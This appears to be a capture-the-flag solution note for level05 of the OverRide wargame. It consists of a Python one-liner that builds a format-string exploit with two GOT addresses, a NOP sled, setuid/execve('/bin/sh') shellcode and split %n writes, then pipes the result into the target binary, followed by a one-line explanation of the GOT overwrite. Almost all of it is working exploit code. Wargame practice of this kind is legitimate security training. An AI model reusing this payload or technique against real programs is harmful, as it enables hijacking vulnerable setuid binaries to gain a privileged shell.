534 B
534 B
level05@OverRide:~$ rm -f exploit && python -c "print('\xe0\x97\x04\x08'+'\xe2\x97\x04\x08'+'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'%54914x'+'%10$n'+'%10555x'+'%11$n')" > exploit level05@OverRide:~$ cat exploit - | /home/users/level05/level05
write in 2 times with %n $ speifiy argument number, overwrite GOT table to jmp to shellcode